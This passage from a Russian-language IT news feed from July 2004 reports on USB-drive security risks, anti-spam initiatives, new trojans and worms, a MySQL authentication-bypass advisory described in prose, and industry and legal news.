зачастую в силу ряда, в основном сугубо субъективных причин подобный вариант неприемлем в ряде компаний. Вот именно для подобных случаев мы и приводим ссылки на программы, призванные хотя бы частично обезопасить подобных пользователей.
Qwik-Fix
SmartFix

8/07/2004 13:16 Аналитики рекомендуют запретить USB-накопители
Аналитическая компания Gartner опубликовала доклад, озаглавленный "Как бороться с угрозой, исходящей от портативных устройств хранения". По мнению составителей доклада, пользование в компаниях накопителями, подключаемыми по интерфейсу USB или FireWire, сопряжено с целым рядом рисков, от попадания вредоносных программ в корпоративную сеть до хищения конфиденциальных данных. "Опасными" в Gartner считают карманные портативные жесткие диски, накопители на флэш-памяти, а также MP3-проигрыватели типа Apple iPod и цифровые камеры. Аналитики рекомендуют компаниям запретить своим служащим пользоваться такими устройствами и отключить в операционных системах функцию Universal Plug-and-Play. Как вариант более гибкой политики, в Gartner советуют пользоваться программами контроля над портами (например, персональными межсетевыми экранами), шифровать сохраняемые на портативные носители данные и применять технологии защиты от копирования для конфиденциальной информации.
"Открытые системы"

8/07/2004 11:41 "МТУ-Интел" представила безлимитный тариф на коммутируемый доступ
Компания «МТУ-Интел» объявила об изменениях в своей тарифной политике по коммутируемому доступу и ввела с сегодняшнего дня ряд новых тарифных планов для Москвы и Московской области. Компания ввела безлимитный тариф XXL, абонентская плата по которому составляет $60 в месяц. Кроме этого дополнительно введены два тарифных плана с абонентской платой $10 и $20 и определённым количеством включенного времени и бонусов. Дневной, вечерний и ночной повременные тарифы сохранились. Для того, чтобы воспользоваться новыми тарифными планами, абонентам, подключившимся до 1 июля 2004 г. необходимо зарегистрироваться под новым логином и паролем. Однако, по новым логину и паролю они смогут пользоваться только новым модемным пулом 600-7000. Для подмосковных абонентов вводится единый тарифный план «Подмосковный». Стоимость часа в нем составляет 1,2 USD в дневные и вечерние часы и 0,6 USD ночью. Тарифный план действует на территории всей Московской области. Для пользователей, подключившихся до 1 июля 2004 г. условия договора-оферты не меняются, а все тарифные планы остаются прежними. По всей видимости, изменения в тарифной политики компании вызваны заметным снижением спроса на услуги коммутируемого доступа на фоне растущей конкуренции. В настоящее время, согласно экспертным оценкам, от четверти до трети всех московских домашних пользователей выходят в Интернет по выделенным линиям либо беспроводным подключениям. О смене основного интереса пользователей можно сделать вывод и путем простого сопоставления активности посетителей нашего сайта в разделах форума, посвященных коммутируемому и выделенному доступу.
Подробнее

8/07/2004 11:22 Спам можно победить всего за два года
Интернациональная война против спамеров, которые используют интернет для распространения порнографии, продажи сомнительных товаров и вовлечения пользователей в аферы при помощи новомодных уловок вроде «фишинга», может быть выиграна в течение двух лет, считают лидеры международного атиспамерского движения. Эта мысль была высказана во вторник на пресс-конференции, организованной в рамках трехдневного заседания Телекоммуникационного союза ООН (ITU). «Если мы не объединим усилия, — предупредил собравшихся Роберт Шо (Robert Shaw), эксперт ITU по интернет-стратегиям, — то станем свидетелями того, как миллионы пользователей покинут Сеть, попросту почувствовав разочарование и отвращение». Хортон, на родине которого было составлено наиболее четко проработанное антиспамерское законодательство, надеется, что в результате сотрудничества появится черновой вариант соглашения о мерах борьбы. Он справедливо считает, что ни одна страна не справится с подобной задачей в одиночку — с межнациональным злом следует бороться сообща. Участники конференции заявили о своем намерении изучить различные законодательные акты, которые позволили бы правительствам применять санкции к провайдерам, допускающим использование собственных систем злоумышленниками. Многие из таких поставщиков услуг хорошо известны. Достаточно обратиться к базе www.spamhaus.org — в списке есть довольно громкие имена. Международное сотрудничество также позволило бы наладить более эффективную работу по сбору досье на компании и частных лиц, которые вовлечены в спамерскую деятельность или «фишинг». База в дальнейшем была бы передана сотрудникам прокуратур в странах, гражданами которых являются нарушители.
"Вебпланета"

8/07/2004 10:30 Троян StartPa меняет настройки Internet Explorer
Компания Sophos обнаружила в интернете новую троянскую программу, получившую название StartPa. Этот вирус, пока не получивший широкого распространения, заражает компьютеры, работающие под управлением операционных систем Microsoft Windows. При проникновении на машину троян добавляет файлы My Search Page.url и Weekend Free Movies.url в директорию "Избранное", после чего вносит изменения в настройки браузера Internet Explorer. Кроме того, вредоносная программа модифицирует Hosts-файл браузера таким образом, что при попытке посещения веб-сайта auto.search.msn.com пользователь будет автоматически перенаправлен на другой IP-адрес.
Описание трояна

8/07/2004 10:09 В Воронеже судят хакера
В Центральном районном суде Воронежа начался судебный процесс по делу о неправомерном доступе к компьютерной информации, сообщает РИА "Новости" со ссылкой на ГУВД Воронежской области. По данным предварительного расследования, восемнадцатилетний воронежец Михаил Крынин с помощью специальных программ похищал чужие пароли для доступа в интернет и использовал их, для того чтобы бесплатно выходить в Сеть. Среди пострадавших от деятельности хакера фигурируют свыше двадцати физических лиц и компаний. Ущерб, нанесенный пострадавшим деятельностью Крынина, оценивается в 12000 рублей. По словам судьи Олега Матюхина, прекращение данного судебного процесса возможно в случае, "если потерпевшая сторона заявит ходатайство о прекращении уголовного дела в отношении обвиняемого, но пока такового в распоряжение суда не поступало". Максимальное наказание в соответствии со статьей 272 УК РФ за данный вид преступления предусматривает два года тюрьмы, сообщили РИА "Новости" в пресс-службе ГУВД.
РИА "Новости"

7/07/2004 13:53 США: закон не запрещает интернет-провайдерам перехватывать электронную почту
Апелляционный суд США принял решение об аннулировании обвинений вице-президента интернет-провайдера Interloc в нарушении федеральных законов США о перехвате сообщений электронной почты, cообщила "Компьюлента". Бредфорд Каунселмен обвинялся в том, что в январе 1998 года заставил служащих написать компьютерный код для чтения входящих сообщений компании-конкурента Amazon.com. Судья апелляционного суда постановил, что закон о перехвате сообщений частными лицами не запрещает поставщикам интернет-услуг и другим провайдерам читать сообщения, находящиеся на их серверах, добавив, что закон о перехвате сообщений защищает проводную и телефонную связь гораздо сильнее, нежели электронную. Защитники конфиденциальности сходятся во мнении, что апелляционный суд своим постановлением предоставляет свободу шпионажа поставщикам интернет-услуг и правоохранительным органам и предупреждают пользователей электронной почты о том, что, согласно закону, они не могут более рассчитывать на секретность своих сообщений.
Yahoo

7/07/2004 13:32 IEEE вплотную занялась разработкой стандарта 802.11n
Следующая неделя обещает стать достаточно горячей для одного из подкомитетов IEEE по разработке нового стандарта беспроводной связи - 802.11n. Шутка ли, комитету предстоит рассмотреть 61 предложение по спецификациям нового Wi-Fi стандарта, внесенного от разных компаний и организаций. С другой стороны, столь большое количество предложений явно указывает на повышенный интерес и важность этой работы. Как известно из предварительных данных, новый WLAN-стандарт будет поддерживать скорости обмена данными уровня 100 - 200 Мбит/с. Подразумевается, что стандарт IEEE802.11n послужит основной для скоростной беспроводной передачи потокового аудио, видео и данных для ПК и бытовой электроники. К настоящему времени основную массу компаний, предъявляющих к стандарту противоречивые требования, можно разделить на две группы. Одна из них, называющая себя TG nSynch и включающая Atheros, Intel, Matsushita, Philips и Sony настаивает на использовании 40 МГц ширины канала. В то время как конкурирующая группа компаний World Wide Spectrum Efficiency (WWiSE), в которую входят Airgo, Broadcom, Conexant, Mitsubishi, Motorola, STMicroelectronics и Texas Instruments, настаивает на использовании канала шириной 20 МГц. Сильным аргументом группы TG nSynch является то, что использование более широких 40 МГц каналов в сочетании даже с самыми простыми методами уплотнения позволит достичь 2x - 3x кратного увеличения скорости передачи по сравнению с нынешним поколением Wi-Fi. В то же время группа WWiSE ратует за более узкие 20 МГц каналы передачи данных, но в сочетании с прогрессивными методами уплотнения сигнала, в комбинации с технологией MIMO (multiple-input, multiple-output).
Mobile-review.com

7/07/2004 13:01 Рынок пиратского софта неумолимо растет
Рынок пиратского софта растет год от года. Оборот в этой индустрии, по оценкам некоторых экспертов, достиг 29 млрд долларов в 2003 году, что составило 60% от всего мирового рынка софта (51 млрд долл). Со времен начала интернет-бума производители софта и медиа стали замечать резкий рост пиратского использования материалов, защищенных копирайтом. Копирайту стали угрожать и файлообменные сети, и онлайновые магазины, делающие распространение интеллектуальной собственности практически неподконтрольной правообладателю. Исследование Business Software Alliance (BSA) показало, что в 2003 году 60% рынка софта было охвачено пиратской продукцией. В BSA входят такие крупные компании, как Microsoft, Apple Computer, Intel и многие другие, пишет Reuters. BSA уже несколько лет пытается обуздать нелегальное распространение и использование программного обеспечения. На перевоспитание пользователей альянсом уже были потрачены огромные суммы. Также постоянно ведется работа с полицией по выявлению и пресечению деятельности преступных групп, распространяющих контрафакт.
"Вебпланета"

7/07/2004 12:27 Летят утки: китайцы ничего не знают о загадочном "протоколе IPv9"
Судя по некоторым комментариям, данным представителями китайского IT-истеблишмента, таинственная девятая версия интернет-протокола - это мертворожденное дитя, отец которого не известен. Журнал The Register сообщает, что история с интернет-протоколом IPv9 приобрела новое звучание после того, как Винтон Серф (Vinton G. Cerf), взбешенный самоуправством китайских товарищей, отправил письмо руководителям местного интернет-сообщества. В своем послании господин Серф в предельно вежливой форме поинтересовался, за каким, собственно, чертом Китайской народной республике понадобился свой собственный интернет-протокол и где можно посмотреть на решение IANA, в котором никому не известный 'IPv9' закрепляется за КНР? И вообще, кто стоит за спиной Shanghai Jiuyao Digital Network Company, которой приписывается авторство протокола? Как оказалось в ходе дальнейших разбирательств, заметка, промелькнувшая в ленте официального рупора Коммунистической партии Китая, оказалась не соответствующей действительности в своей основной части. То есть, интернет-протокол действительно существует, но, будучи чисто академическим проектом, 'IPv9' пока не вышел даже на уровень альфа-версии и пока сложно сказать, дойдет ли он до этого уровня вообще. Разработка протокола началась два года назад, когда Китайская академия наук (КАН) предложила ряду научных организаций разработать новую версию интернет-протокола, которая могла бы заменить не только устаревший IPv4, но и еще толком не рожденный IPv6. Кроме того, предполагалось, что в ходе работы над проектом будет создана и система Digital Domain Names, которая стала бы альтернативой системе DNS, ныне применяемой для навигации в Сети. Основное отличие IPv9 от IPv6 заключается в том, что китайская версия протокола должна была иметь в своем основании не 128-битную, а 256-битную систему интернет-адресации, что позволило бы создать практически бесконечно большой массив IP-адресов (как известно, даже 128-битная система обладает такими резервами емкости, которых хватило бы на присвоение каждой песчинке в пустыне Сахара своего IP-адреса).
Internet.ru

7/07/2004 11:40 1Gb.ru (ЗАО «Ин-Солв», Москва) борется со спамом
1Gb.ru (ЗАО «Ин-Солв», Москва) извещает о том, что сегодня, 7-го июля, вводится в тестовую эксплуатацию ее новая бесплатная услуга — «Фильтрация нежелательной почты (спама)». Эта услуга предусматривает несколько вариантов борьбы со спамом. Для нее было разработано программное обеспечение, позволяющее использовать любые доступные фильтры и принимать решения в зависимости от результатов их работы. В настоящий момент используется система фильтрации почты SpamAssassin 2.63, а также собственные несложные фильтры «Ин-Солва». В дальнейшем возможно подключение других систем.
Подробности

7/07/2004 11:28 Минобороны РФ клонирует процессоры Texas Instruments?
Как стало известно CNews.ru, в Министерстве обороны России было принято решение выделить средства на производство в нашей стране отечественных аналогов сигнальных процессоров американской корпорации Texas Instruments, используемых сейчас в российских вооруженных силах. В начале 90-х, после развала CCCP, производство электронных компонентов в нашей стране пришло в упадок, и запрет Министерства обороны, обязывавший конструкторов использовать в военной технике только отечественные комплектующие, был постепенно снят. Так, известно, что, например, в навигационных системах российских вертолетов уже давно начали использовать процессоры Intel. Используются и готовые аппаратно-программные решения — в частности, аппаратура американской спутниковой навигационной системы Navstar. Широко используются импортные комплектующие и в космической технике. В ключевых модулях военных систем связи России используются сигнальные процессоры от Texas Instruments. Для повышения обороноспособности было принято решение создать аналоги таких процессоров в недрах отечественной промышленности. По информации CNews.ru, Министерство обороны России в ближайшее время собирается выделить около 50 млн. рублей для разработки и производства этих процессоров на одном из отечественных предприятий электронной промышленности. Пресс-служба Минобороны оказалась не готова дать комментарии нашему изданию. Среди возможных разработчиков нового процессора специалисты называют зеленоградское НПЦ «ЭЛВИС», в котором на базе собственной открытой IP-ядерной платформы проектирования «систем на кристалле» — «Мультикор» — уже созданы несколько серий высокопроизводительных отечественных процессоров цифровой обработки сигналов. Получены полностью работающие тестовые образцы этих чипов под кодовыми номерами МС12S и МС23S, не уступающих, по словам разработчиков, зарубежным аналогам таких лидеров индустрии сигнальных процессоров, как Texas Instruments или Analog Devices. Серийное производство новых процессоров планировалось начать уже в первом полугодии этого года. Интерес отечественных военных к разработкам зеленоградцев подтверждает февральский визит в «ЭЛВИС» генерального директора РАСУ (Российского агентства по системам управления, которое в конце мая вошло в состав Федерального агентства по промышленности) Геннадия Козлова.
CNews

7/07/2004 11:01 ООН принимается за борьбу со спамом
Организация объединенных наций обратила свое внимание на проблему распространения спама. В Женеве прошла специальная встреча по данному вопросу, организованная Международным союзом электросвязи (МСЭ), сообщает "Компьюлента". Эта организация работает при ООН и курирует международное сотрудничество в области систем связи и обмена информацией. Во встрече приняли участие представители 60 стран и нескольких международных организаций, в частности, Совета Европы и ВТО. На встрече были обнародованы данные, согласно которым на спам приходится сейчас 85% мировой электронной корреспонденции. А экономический ущерб от несанкционированных рекламных рассылок, по оценкам МСЭ, в 2003 году достиг 25 млрд. долларов США. Для повышения эффективности борьбы со спамом в ООН предлагают разработать единый проект закона по борьбе с незаконными рассылками. Если законы, основанные на рекомендациях ООН, будут приняты в большинстве стран, можно будет значительно облегчить международное взаимодействие в борьбе с этой напастью. Особенно большое внимание в МСЭ и ООН уделяют проблеме рекламы порнографии в спамерских рассылках. Такой спам особенно вреден, так как может попасть в почтовые ящики несовершеннолетних пользователей интернета. В МСЭ обращают особое внимание и на проблему так называемого "фишинга" (phishing - искаженное английское слово fishing - рыбалка). Это специфическая разновидность спама, в которой авторы рассылок подделывают обратные адреса и выдают себя за представителей финансовых структур, провайдеров интернета, операторов связи и т.п. В письмах от получателя просят под благовидным предлогом отправить по предлагаемому адресу свои персональные данные: логины, пароли, номера счетов и кредитных карт. В результате пострадавшие могут понести значительный ущерб. Между тем, фишинг - достаточно эффективный способ мошенничества. По данным МСЭ, на него клюет каждый десятый пользователь интернета.

7/07/2004 10:06 90% организаций ежегодно обнаруживают нарушения информационных систем
Интернет мгновенно реагирует на политическую и экономическую жизнь планеты. В последнее время значительно возросло количество несанкционированных проникновений в информационные системы. Высокотехнологическая преступность увеличивается высокими темпами. Интернет позволяет организованным преступным группам быстро получать прибыль наряду с относительно небольшим риском изобличения. Находясь в сети, можно нарушать закон на расстоянии, быстро и независимо от гражданства и места пребывания. Преступникам легко обманывать множество людей, скрывать доказательства и украденное. Они стали значительной угрозой для критической инфраструктуры развитых стран. По сообщениям информационного агентства Washington ProFile, террорист номер один – Усама Бен Ладен получил компьютерную программу Promis (изготовитель – компания Inslaw Inc.), что позволяет ему проникать в правительственные информационные сети США. Программы, созданные на базе разработок Inslaw Inc., используются, в частности, ФБР (РВІ) и ЦРУ (СІ). В случае если Бен Ладен действительно имеет в своем распоряжении Promis, он может следить за действиями американских спецслужб, получать секретную информацию о стратегических объектах США, а также без проблем «отмывать грязные деньги».
Вице-президент группы страховых компаний Вильям Барр изложил такие факты: 90% организаций ежегодно обнаруживают нарушения информационных систем; 80% из них подтверждают финансовые потери. По прогнозам ведущих экспертов в области информационной безопасности, в ближайшие годы возможно стремительное увеличение количества киберпреступлений. Так, по расчетам компании Gartner, уже в конце 2004 года экономический ущерб от них увеличится в 10 - 100 раз. Подобные прогнозы вынуждают правительство США и Европейское Сообщество срочно принимать соответствующие меры, как на законодательном, так и на организационном уровнях. В частности, правительством США принята новая Стратегия по защите информационных систем в Интернете (бюджетом планируется выделение около 60 млрд. долл.), в Совете Европе создается специальный Комитет – «Агентство информационной безопасности», соответствующие меры принимаются на уровне ООН. Поэтому, учитывая то, что пока мир остается в электронной зависимости, угрозы киберпреступности не исчезнут, необходимо разработать стратегию защиты на каждом предприятии, в организации, в национальном масштабе и во всем мире. Противодействие компьютерной преступности предусматривает, прежде всего, создание соответствующей законодательной базы, комплекса организационных мер, в том числе – подготовку кадров высокой квалификации, а также соответствующее специальное техническое обеспечение.
crime-research.ru

7/07/2004 09:44 mp3-плейеры как угроза сетевой безопасности
Аналитики Gartner в опубликованном на этой неделе отчете предупреждают о потенциальной угрозе для корпоративной безопасности набирающих популярность многочисленных USB/FireWire-устройств, предназначенных для хранения данных, в том числе mp3-плейеров типа iPod, цифровых камер и т.п., сообщает bugtraq.ru. Они компактны, легко преодолевают защиту периметра, с их помощью можно быстро внедрить в сеть какой-либо вирус и, наоборот, вынести критичную информацию, они, в конце концов, могут быть легко потеряны либо украдены. Подчеркивается необходимость внедрения в организациях, заботящихся о своей безопасности, четких процедур и технологий, обеспечивающих подконтрольность использования подобных устройств - как это было в свое время с дискетами и компакт-дисками.
Подробности

6/07/2004 14:17 Windows XP теперь производят и в России
Государственная техническая комиссия при Президенте Российской Федерации выдала заключение о соответствии производства операционной системы Microsoft Windows XP требованиям по обеспечению качества и неизменности сертифицированных параметров. Производство этой ОС организовано на базе ФГУП «Предприятие по поставкам продукции Управления делами Президента Российской Федерации» и ЗАО «Алтэкс-строй 2002». Проверка производства в соответствии с новым руководящим документом Гостехкомисссии России «Критерии оценки безопасности информационных технологий» предусматривала не только оценку состояния процесса производства, но и оценку организации поставки и системы послепродажного обслуживания клиентов, пишет «Секрет фирмы» со ссылкой на пресс-службу Microsoft. Производство сертифицированных систем организовано на производственных площадях ФГУП «Предприятие по поставкам продукции Управления делами Президента Российской Федерации» и включает входной контроль носителей сертифицированной продукции, контроль сертифицированных параметров, маркирование и выходной контроль. Учет, организация поставок, послепродажное обслуживание, организация удаленного доступа к сертифицированным изменениям операционной системы Microsoft Windows XP будут осуществляться управляющей компании ЗАО «Алтэкс-строй 2002». Windows XP, как сообщается, является наиболее востребованной версией ОС, поставляемых Microsoft в Россию и страны СНГ. Ее производство будет способствовать обеспечению и поддержанию уровня безопасности объектов информатизации на территории РФ. Выполнение данной задачи будет включать: предоставление конечному пользователю пакета услуг по корректной настройке встроенных в Windows XP и дополнительных механизмов безопасности; обеспечение постоянного доступа к сертифицированным изменениям Windows XP; централизованный учет и обслуживание объектов информатизации; вытеснение пиратских копий этой ОС из государственного сектора.
"Вебпланета"

6/07/2004 13:45 Серьезное нарушение связности в российском сегменте Сети
5 июля 2004 г., в течение дня наблюдались серьезные нарушения связности в российском сегменте Сети, продолжающиеся и к моменту подготовки данного материала. Серьезные проблемы наблюдались у "ГолденТелекома", были недоступны сети компаний "Телепорт-ТП" и "DataForce", наблюдались перебои в работе jabber.ru. По непроверенной пока информации, наблюдаемые проблемы связаны с аварией, предположительно произошедшей в сети компании "ТелияСонера" в ее петербургском сегменте. Официальных заявлений, касающихся сегодняшнего нарушения связности, ни от одной из компаний-фигурантов пока не поступало.
"Независимый обзор провайдеров"

6/07/2004 13:05 Обход аутентификации в MySQL
Британская компания NGSSoftware, занимающаяся клмпьютерной безопасностью, сообщает об обнаружении уязвимости в популярной в мире открытых систем СУБД MySQL. Наличие этой уязвимости позволяет удалённому пользователю полностью обойти механизм аутентификации, применяемый в этой СУБД (логин/пароль). Используя тот же самый метод, можно вызвать переполнение буфера в стэке, используемом этим механизмом, хотя подобная атака и является более сложно реализуемой. Уязвимость связана с некорректной проверкой хэша пароля в функции check_scramble_323() - при пустом поле пароля (нулевой длины) функция возвращает "нулевое" значение, что, фактически обозначает положительный результат аутентификации. Как отмечают авторы, для осуществления полноценной атаки необходимо написать свой клиент MySQL, а также знать имя пользователя. В связи с этим в качестве временной меры рекомендуется сменить стандартное имя суперпользователя (root), а также пропускать к MySQL-серверу по IP-адресам (что, зачастую, не всегда реализуемо). Уязвимости подвержены версии 1.4 (до 1.4.3) и 5.0. Разработчики - MySQL AB, устранили уязвимость в 1.4.3 и в текущих билдахх 5.0. Кроме того, NGSSoftware выпущен комплексный 22-страничный документ в PDF-формате под названием "Hackproofing MySQL", детально описывающий различные методы атак на MySQL-сервер, в том числе довольно различные варианты SQL injection.
Документ от NGSSoftware

6/07/2004 12:32 Fujitsu ищет применение стеганографии в рекламе и коммерции
Лаборатория компании Fujitsu cообщила о создании новой технологии внедрения «невидимых» знаков в печатное изображение. В данном случае изобретение касается не «водяных знаков», предназначенных для создания аутентификационных меток на ценных бумагах, а об источнике дополнительной цифровой информации вроде номеров телефонов или веб-адресов. Разработчики из Fujitsu утверждают, что на изображение размером 1х1 см им удалось записать 12-значный номер телефона. Цифры записаны в виде отдельных точек желтого цвета, которые размещаются на обычном изображении. При этом изображение разбивается на отдельные сегменты — квадраты со стороной 0,8 мм или меньше. Перед наложением цифр на изображение анализируется уровень интенсивности желтого цвета в соседних блоках, и нанесенные точки, отображающие цифры, по интенсивности практически не отличаются от желтого оттенка в конкретном блоке. Желтый цвет выбран не случайно — глаз его воспринимает неустойчиво, а оттенки желтого различаются с большим трудом. Другое дело, когда то же изображение попадает в фотоприемник цифровой камеры — там напечатанные желтым цветом цифры явно видны. Для распознавания цифр и перевода их в двоичный код имеется специальная программа, которая, например, на КПК Fujitsu позволяет провести распознавание за 0,4 с. Для чего может пригодиться новая технология? В Fujitsu cчитают, что ее внедрение поможет избавиться от штрих-кодов, которые для потребителя не несут значимой информации (редко кто может сказать, что изображают штрихи в таких кодах). А телефон или URL, незаметно записанный на рекламе товара или услуги, может быть считан мобильным телефоном или КПК, с тем, чтобы в дальнейшем можно было позвонить в компанию или выйти на сайт производителя товара. Можно также записать номер телефона в изображение на визитной карточке — тогда не придется вводить его вручную, достаточно лишь провести сканирование и распознавание. Fujitsu в настоящее время рассматривает и другие варианты коммерческого использования новой технологии.
CNews

6/07/2004 12:13 Автор вируса Bagle распространил «опасный» код на ассемблере
В воскресенье в интернете распространились два новых варианта, а также исходный код оригинального червя Bagle — эксперты считают, что это опасный поворот событий. Автор Bagle начал распространять два новых варианта червя и запустил массовую рассылку по e-mail его исходного кода — это может стать началом еще одного жаркого лета для пользователей Windows. Червь Bagle впервые появился в январе в виде e-mail-вложения и за несколько месяцев вышел более чем в 25 вариантах. В зараженные ПК загружается троян, по существу мобилизующий компьютеры в армию зомби автора червя, которую тот может использовать для распространения спама и других почтовых рассылок и для организации DDoS-атак. В этот уикенд появились не только две новых версии Bagle, но якобы оригинальный исходный код червя. Микко Гиппонен, директор по антивирусным исследованиям компании F-Secure, считает, что исходный код подлинный, а тот факт, что он написан на чистом ассемблере, свидетельствует о том, что мы имеем дело не со script kiddie, а с серьезным программистом. «Большинство червей пишут на языке С или частично на С и частично на ассемблере. Осталось не так много людей, хорошо знающих ассемблер, так что за этим стоит серьезный программист», — сказал он. Гиппонен говорит, что хотя ассемблер — трудный язык, для мастера не составит труда модифицировать код и создать новые варианты Bagle, так что администраторам Windows предстоит жаркое лето. «Изменить такие вещи, как номер порта или текст рассылаемых сообщений, не представляет труда. Я уверен, что это приведет к выбросу новых вариантов Bagle — как было в феврале и марте», — говорит Гиппонен. С другой стороны, возможно, что таким способом автор надеется замести следы. Если исходный код будет присутствовать на множестве компьютеров, то в случае ареста автора код, найденный в его компьютере, перестанет служить уликой против него.
Подробности

6/07/2004 11:54 Восстановление цифровых фото
На сайте "сетевого сообщества" (он же bugz.ru) опубликована довольно интересная и, возможно, небесполезная для посетителей нашего сайта статья, посвящённая описанию того, как можно восстановить удаленные, отформатированные и просто испорченные фотографии с флеш-карт (таких как CompactFlash, MemoryStick, SmartMedia и тому подобных), используемых в большинстве новых моделей цифровых фотоаппаратов. Автор статьи - BzTnitrod. Хотелось бы также обратить внимание, что по мнению некоторых (надеюсь, знающих) людей - комментарии к статье намного толковее её самой. ;)
Cтатья

6/07/2004 11:31 После атаки с использованием дыры в IE растет популярность Mozilla
Поразившая интернет на прошлой неделе атака хакеров привела к росту интереса пользователей к альтернативным браузерам. Сразу несколько организаций рекомендовали пользователям отказаться от использования Internet Explorer ввиду наличия в нем большого количества дыр, которыми так и рады воспользоваться хакеры. Эти рекомендации опубликовало, в частности, и Министерство внутренней безопасности США на своем совместном с организацией CERT веб-сайте US-CERT. Призывы экспертов по безопасности возымели свое действие, и многие пользователи решили перейти на альтернативные решения. Как рассказал журналу Wired директор по разработке Mozilla Foundaton Крис Хофманн, практически сразу после выпуска рекомендации CERT количество загрузок браузера Mozilla Firefox удвоилось и достигло примерно 200 тысяч копий в день. По мнению экспертов Mozilla Firefox является более безопасным браузером, чем Internet Explorer. Во-первых, Firefox не поддерживает технологии ActiveX, которая является настоящим скопищем дыр в IE, а во-вторых, заметно менее распространен.
Подробности

6/07/2004 10:50 В Японии зафиксировано рекордное число вирусных инцидентов
Число вирусных атак, зафиксированных в Японии, в первом полугодии 2004 года достигло рекордной отметки. С января по июнь включительно в этой стране произошло 36309 вирусных инцидентов, сообщает агентство «Синьхуа» со ссылкой на производителя антивирусного программного обеспечения - компанию Trend Micro. Предыдущий рекорд по числу вирусных атак за полугодие в Японии был зафиксирован во второй половине 2003 года. Тогда там произошел 30581 инцидент. Значительная их доля была связана с распространением червя Lovesan. В текущем году самым распространенным в Японии вирусом стал NetSky (4186 инцидентов). На втором месте оказался вирус Bytever (1355 инцидентов). Японское агентство по продвижению информационных технологий предупредило пользователей об увеличении частоты вирусных инцидентов с начала 2004 года. Вместе с тем эксперты отметили снижение числа зараженных компьютеров по сравнению с предыдущим пиком вирусных эпидемий, зафиксированным в 2001 году.
Подробности

6/07/2004 10:13 США, Великобритания и Австралия создали антиспамерский альянс
США, Великобритания и Австралия объединяют усилия для борьбы со спамом. С таким заявлением в конце прошлой недели выступили представители Федеральной комиссии США по торговле (FTC), сообщает Reuters. Правоохранительные органы трех стран будут совместно выявлять спамеров, которые рассылают свои письма на территории других государств, чтобы избежать судебного преследования. «Спам не чтит национальные границы», - пояснил председатель FTC Тимоти Мюрис (Timothy Muris). В настоящее время многие спамеры отправляют свои письма из США, однако используют при этом машины, находящиеся на территории других стран. Таким образом спамеры усложняют работу правоохранительных органов. После принятия в США федерального закона о борьбе со спамом американские интернет-провайдеры отметили увеличение спамового трафика из-за рубежа. Достигнутое 2 июля соглашение позволит FTC, трем государственным агентствам Великобритании и двум государственным агентствам Австралии обмениваться информацией и вести совместные расследования по факту отправки спама. Всемирная конференция по борьбе со спамом должна состояться в октябре в Лондоне. Основатель антиспамерского объединения Spamhaus Project Стив Линфорд (Steve Linford) считает, что трехстороннее соглашение не принесет каких-либо заметных результатов. «Наиболее полезным в данном случае было бы присоединенить к соглашению Китай», - заявил Линфорд. По его словам, в этой стране получают хостинг до 70% сайтов, рекламируемых в спамерских письмах.
viruslist.com

5/07/2004 14:11 Почта «Яндекса» заработала по антиспам-стандартам
5 июля «Яндекс» объявил о поддержке протокола антиспамовой идентификации и предлагает всем владельцам почтовых служб и провайдеров присоединиться к этому стандарту. Как сообщается, уже с 1 сентября почта «Яндекса» будет учитывать идентификацию других почтовых серверов как параметр «Спамообороны» — антиспамового фильтра, которым защищена вся почта «Яндекса»: и публичная, и корпоративная. Теперь для любого письма с обратным адресом в доменах, принадлежащих «Яндексу», можно проверить подлинность отправителя. Яндекс поддерживает спецификации SPF (Sender Policy Framework) и Caller-ID for E-Mail. Идентификация поможет администраторам других почтовых служб отличать реальные письма пользователей «Яндекса» от подделок. Одна из самых известных уязвимостей протокола SMTP, ставшая основой существования почтового спама, — возможность подделки адреса отправителя электронной почты. На сегодня существует два популярных протокола, решающих эту проблему: Caller ID и SPF. Сейчас происходит процесс объединения их в общий стандарт, который будет называться Sender-ID. Пока же «Яндекс» поддерживает обе спецификации. Поддержка протоколов идентификации отправителя уже реализована в популярных почтовых программах, а также рекомендована в предложениях ASTA (Anti Spam Technical Alliance) — антиспамового альянса, в который входят такие крупные компании, как AOL, EarthLink, Comcast, BT, Microsoft, Yahoo.
"Вебпланета"

5/07/2004 13:38 Недельный отчет о вирусах Panda Software
Опубликован традиционный еженедельный отчёт вирусной активности минувшей недели от Panda Software. В отчёте рассмотрены три троянца, предоставляющие удаленный доступ к компьютеру - Webber.S, Webber.P и Agent.E, два троянца - Bankhook.A и Scob.A, а также три новые версии Korgo.
Отчёт

5/07/2004 12:55 Червь массовой рассылки Evaman
Компания Symantec обнаружила новую вредоносную программу Evaman, распространяющуюся посредством электронной почты в виде вложений с расширениями .exe или .scr размером 14848 байт. После запуска присланного файла пользователем ПК червь открывает "Блокнот", входящий в стандартную поставку операционных систем Microsoft Windows, и вносит изменения в реестр. Далее вирус выбирает произвольный SMTP-сервер из заложенного в коде списка и осуществляет массовую рассылку собственных копий по электронной почте. При этом адреса получателей собираются по результатам поиска, выданным службой people.yahoo.com в ответ на произвольный запрос.
Описание

5/07/2004 10:33 В Великобритании готовится новый закон о киберпреступлениях
К закону 1990 года, который регулировал борьбу с компьтерными преступлениями, в Великобритании разрабатывается исправление, сообщает "Компьюлента". Старая формулировка уже не рассматривает все нюансы, за которые хакеры могут понести наказание. В связи с этим в закон будет внесена поправка, согласно которой к хакерам будут применяться жесткие меры наказания, вплоть до тюремного заключения. В поправку будут включены такие действия, как атаки со стороны злоумышленников на системы, которые подрывают работу сетей и выводят их на длительное время из строя. Поправка предусмотрит законное разрешение таких проблем, как компьютерные преступления, а также кражи баз данных.
Подробнее

5/07/2004 10:05 В июле IBM представит Unix-сервер на Power5
